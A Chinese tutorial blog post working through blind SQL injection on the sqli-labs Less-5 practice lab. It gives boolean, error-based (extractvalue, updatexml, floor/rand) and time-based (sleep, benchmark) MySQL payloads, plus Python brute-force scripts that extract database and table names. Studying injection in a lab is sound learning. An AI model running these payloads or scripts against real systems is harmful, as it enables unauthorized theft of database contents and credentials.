由sqli-labs/Less-5学习各种基础盲注技巧
本文为本人在学习中的总结,仅涉及基础的盲注技巧,可能多有疏漏之处,欢迎指教。
另外本人博客的SQL注入分类下有一些方面的详细讲解,在此只介绍简单的使用。
0x00、介绍一下本人对盲注的总结。
盲注就是在没有回显的结果下进行推断性的注入,这样我们有几种办法来注入:
1、根据页面正常与否判断payload是否正确(基于bool的盲注)
2、想办法让页面产生回显(个人感觉这个比较好用)(基于报错的盲注)
3、利用页面的延迟反应判断payload是否正确(基于延时的盲注)
0x01、盲注的大纲
1、布尔盲注
也就是上面说的根据页面是否正常来进行判断和注入。
1)字符串截取函数进行注入
了解一下会经常用到的MySQL字符串截取函数。
原理及简单应用参考:https://blog.csdn.net/zz_Caleb/article/details/86814043
2)regexp正则注入
原理及简单应用参考:https://blog.csdn.net/zz_Caleb/article/details/86814922
3)like匹配注入
例如:select user() like ‘ro%’
| 通配符 | 描述 |
|---|---|
| % | 替代一个或多个字符 |
| _ | 仅替代一个字符 |
这三部分为bool盲注主要方法。
2、基于报错的盲注
想办法让页面产生回显
1)经典语句注入
select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
select user()处就是语句作用的地方,将其换成我们简单注入是用的语句来获取回显内容。
以上语句可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))
注:若order by结果为三栏,select处应为select 1,2,count(*)
这里version()是语句作用点
2)exp()注入:利用double 数值类型溢出
原理参考:https://blog.csdn.net/zz_Caleb/article/details/86807364
3)bigint 溢出注入
原理参考:https://blog.csdn.net/zz_Caleb/article/details/86808589
4)extractvalue注入
用法:extractvalue(1,concat(0x7e,(select @@version),0x7e))
//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误
5)updatexml注入
用法:updatexml(1,concat(0x7e,(select @@version),0x7e),1)
//mysql对xml数据进行查询和修改的 xpath 函数,xpath 语法错误
6)利用数据的重复性
用法:select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
//mysql 重复特性,此处重复了 version,所以报错
3、基于时间的盲注——延时注入
1)if+sleep()
一般用法:If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句,条件为假,执行 sleep
Ps: 遇到以下这种利用 sleep()延时注入语句
select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));
该语句意思是在 0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。
2)if+benchmark()
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘MSG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
//BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的 cpu 资源。推荐使用sleep()函数进行注入。
小准备:
在讲解之前首先公布我们要找的东西吧,这样好有个对照。
根据基础的判断,id=1'--+返回正常。
order by:3个字段(username和password分别在第二三个字段)
database:security
group_concat(table_name separator '@'):emails@referers@uagents@users (我们用到users)
group_concat(column_name separator '@'):user_id@first_name@last_name@user@password@avatar@last_login@failed_login@id@username@password (我们用的是username和password)
提一下id=1'--+的判断吧:
id=1 and 1=2--+如果语句正常,则应返回一个错误页面,于是在id=1后面加符号进行判断,当id=1' and 1=2--+是页面错误。
0x02、进行bool盲注
主要是用substr()和mid(),个人认为这两个函数写脚本好些点。
首先暴库长:length()
http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20length(database())=8--+
此时页面正常,所以库长为8。次处用的=判断长度,用二分法判断时用大于小于号,效率更高。
注:本次脚本没写一个二分的,刚开始就想写点简单暴力的,尽量顺利点。
1、left()
http://127.0.0.1/sqli-labs/Less-5/?id=1' and left(database(),1)='s'--+
提供一个left暴库脚本,没有使用二分法,直接爆破。
import requests
url = "http://127.0.0.1/sqli-labs/Less-5/?id=1'"
eng="qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()"
database = ""
s = 'You are in'
for i in range(1,9):
for j in eng:
d = database + j
payload = " and left(database(),%s)='%s'--+"%(i, d)
u = url + payload
t = requests.post(u).text
print(u)
#print(t)
if s in t:
database += j
print(database)
breakleft()不易判断长度,联合表长及联合字段长不能用length()判断,所以left()用来暴库名可用度较高。
2、substr()和mid()
这两个函数用法一样,以substr为例,下面的使用只需将substr换成mid就可实现mid的使用。
1)暴库:(非二分法)
http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20substr(database(),1,1)=%27s%27--+
页面返回正常,说明库名第一个字符为s,更改s出的字符来判断库名,下面给出脚本:
import requests
eng="qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()"
s = "You are in"
url = "http://127.0.0.1/sqli-labs/Less-5/?id=1'"
database = ""
for i in range(1,9):
for j in eng:
payload = " and substr(database(),%s,1)='%s'--+" %(i, j)
u = url + payload
r = requests.post(u).text
print(u)
if s in r:
print(j)
database += j
break
print(database)暴表、字段时只需在database()修改查询语句即可。
2)暴联合表长
为什么要暴表长呢,前面暴库时range()里是库长,长度能帮助我们更好爆破名字。
import requests
url = "http://127.0.0.1/sqli-labs/Less-5/?id=1'"
s = "You are in"
i = 1
while True:
payload = " and substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema=database()),%s,1)=''--+"%i
u = url + payload
r = requests.post(u).text
print(u)
if s in r:
print(i) #联合表名最后面是#,结果得到的长度包括#,也就是得到的结果减一得到实际的联合表长
break #最后结果是30,就是说联合表长为29
i += 1解释一下这个payload,我们仍使用=判断,当我们截取到最后一个字符的后一个(此处为空),这是就和等号右边匹配,页面返回正常。
3)暴联合表名
直接上脚本,简单易懂:
import requests
url = "http://127.0.0.1/sqli-labs/Less-5/?id=1'"
s = "You are in"
eng="qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()"
tables = ""
for i in range(1,30):
for j in eng:
payload = " and substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema=database()),%s,1)='%s'--+"%(i, j)
u = url + payload
r = requests.post(u).text
print(u)
if s in r:
tables += j
print(tables)
break
print(tables)
后面的暴字段什么的仿照着写就行。
再给出mid的另一个用法(其实也差不多啦):https://blog.csdn.net/zz_Caleb/article/details/86299019
3、regexp正则注入和like匹配注入在上一篇文章已经介绍,适合手工,写脚本比较繁琐,请自行学习。
0x03、基于报错的盲注
报错注入可以帮助我们得到一些信息,但可能不能够想substr()那样完成一次从头到尾的爆破,所以可以和其他的盲注配合使用。
1、经典语句盲注
1)暴库:
意外发现:写payload的时候rand写成了rang也报错了。
2)暴表的个数
这里我们不同于bool盲注暴长度,我们爆出的是表的个数
爆出有四个表。
3)暴表名(用到limit)
这里我么就用不了group_concat了,但能用limit。
第一个表:
第二个表:
最后一个表才是users。
4)暴字段数
看到有11个字段。
5)暴字段名
操作和暴表名一样,我们找的是最后两个字段
6)暴username和password的条目数
username个数:
有13个
当然一个username对应一个password,所以password也应该有13个
7)暴username和password内容
方法用limit,和上面的一样,不再赘述。
2、exp盲注
用法:exp(~(select * FROM(SELECT database())a))
这个方法的原理在上篇文章介绍过了
但在Less5这里使用的时候得不到信息,给出另一篇文章,这里面实际应用了exp盲注:https://blog.csdn.net/zz_Caleb/article/details/85063838
3、bigint 溢出注入
原理介绍在上篇文章。
该法此处也得不到信息,个人感觉会exp就会这个。
4、extractvalue注入(xpath函数)
版本号5.5.53
1)暴库:
http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,(database()),0x7e))--+
2)暴表
拿到user表。
3) 暴字段
可以看到暴出的字段数不够,看来我们要采取前面的方法了:先用count()暴出字段数目,再用limit逐个暴出字段。
暴出字段数目:11
接下来就是用limit暴出字段了,我们需要的是username和password,就是最后两个,所以需要limit 9,1和limit 10,1
4)暴内容
我们用group_concat()的方法仍然不能完整得到全部的username,当然如果我们只是拿到username和password来登录,一组数据就够了,但这里为了更加熟练仍尽量全部暴出吗,所以仍然采用count()计数并结合limit来逐个暴出。
不再演示,和上面的过程一样。
5、updatexml注入(xpath函数)
和extractvalue()用法基本一样,就是最后多了一个参数1。
http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)--+
下面的过程和extractvalue()一样,请自行实践。
6、利用数据的重复性
用法:select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x
两个version()出为作用点,但是由于name_const()函数参数的限制,这里只能得出版本号。
0x04、延时盲注
1、if+sleep()
MySQL中if语句的用法:if(condition,ture,false) //条件语句
用法:If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句,条件为假,执行 sleep
本题中应用:http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20if(substr(database(),1,1)=%27s%27,sleep(10),0)--+
为了延时明显用了10秒,一般用5秒。
剩下的就是用substr()来猜解长度和名字了,bool盲注中有详细的介绍,这里不再赘述。
2、if+benchmark()
仍然借助substr()来猜解,不过此方法中BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否行成功。这是一种边信道攻击,在运行过程中占用大量的 cpu 资源。推荐使用 sleep()函数进行注入。
用法:union select 1,2,if(substring(current,1,1)=char(119),benchmark(5000000,encode(‘msg’,’by 5 seconds’)),null) from (select database() as current) as tb1
benchmark第一个参数设置成了40000000,此时延时比较明显,其余的就是substr()的使用了。
这些就是一个基本的整体介绍,本人认为学习一个东西要先掌握其大体框架,然后分层分步逐一攻取。
如有错误欢迎留言指教。
最新文章
- C++中指针数组的分配与释放
- WebForm——IIS服务器、开发方式和简单基础
- 【转】PowerShell入门(九):访问.Net程序集、COM和WMI
- 机房收费系统(VB.NET)——存储过程实战
- redirect的错误用法asp.net怎么使用自定义错误
- C#操作Word文档(加密、解密、对应书签插入分页符)
- postman+jenkins+newman做接口测试的持续集成
- Django发送带图片和附件的邮件
- BootLoader--改进(基于2440)
- (转)maven镜像路径配置
- 【日记】一次程序调优发现的同步IO写的问题,切记
- 必做作业3:原型化设计:地铁扫码app
- python中Multiprocessing
- Clickhouse副本表以及分布式表简单实践
- php处理手机号中间的四位为星号****
- python学习二三事儿(转,整)
- Flask-SQLAlchemy 无法创建Sqlite 数据库???
- 人类即将进入互联网梦境时代(IDA)
- 关于diskgenius删除所有分区后,电脑不能识别U盘的问题。
- HDU 3038 How Many Answers Are Wrong(带权并查集,真的很难想到是个并查集!!!)
热门文章
- 一 注册功能&登录功能,权限拦截
- (C#)Image.FromFile 方法会锁住文件的原因及可能的解决方法
- 解题报告:luogu P5536 【XR-3】核心城市
- 启动nginx出错:open() "/var/run/nginx/nginx.pid" failed (2: No such file or directory)
- ibd2sdi — InnoDB表空间SDI提取实用程序
- 如何书写高效的MySQL查询?
- Html5 -- 语义标签兼容性处理
- JAVA虚拟机:虚拟机字节码执行引擎
- No 'Access-Control-Allow-Origin'跨域问题- (mysql-thinkphp) (6)
- kali 中文乱码解决方法